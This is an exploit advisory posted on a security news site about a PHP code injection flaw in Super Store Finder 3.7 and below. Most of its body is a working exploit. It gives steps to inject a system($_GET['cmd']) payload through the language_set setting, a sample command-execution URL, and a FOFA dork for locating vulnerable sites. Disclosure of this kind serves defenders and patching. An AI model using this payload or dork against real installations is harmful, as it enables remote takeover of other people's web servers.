Home Tools Exploits & CVE's Super Store Finder 3.7 Remote Command Execution

Super Store Finder 3.7 Remote Command Execution

September 22, 2023

231

Authored by Etharus

Super Store Finder versions 3.7 and below suffer from a remote command execution vulnerability.

# Vulnerability : Authenticated Arbitrary PHP Code Injection lead to Remote
Code Execution
# Researcher : Etharus
# Vendor : Joe Iz, https://www.superstorefinder.net/
# Demo Url : https://superstorefinder.net/products/superstorefinder/
# Version Affected : 3.7 and below
# Date : 18 September 2023
# FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Login as user/admin
# Step 2 : Go to Settings on right top
# Step 3 : Turn on proxy to intercept request and save the settings
# Step 4 : On language_set parameter set the value to
  en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//
# Step 5 : Due to index.php called config.inc.php , we just can go for rce
with parameter ?cmd=
# Step 6 : Example. http://localhost/?cmd=uname%20-a

Super Store Finder 3.7 Remote Command Execution

Follow us on Instagram @thecyberpost

EDITOR PICKS

UnitedHealth CEO confirms company paid $22 million ransom in heated Senate...

Ukrainian sentenced to almost 14 years for infecting thousands with REvil...

Investigation uncovers substantial spyware exports to Indonesia

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

MobileTogether Server 7.3 XML Injection

KevinLAB BEMS 1.0 Authenticated File Path Traversal / Information Disclosure

Secure Web Gateway 10.2.11 Cross Site Scripting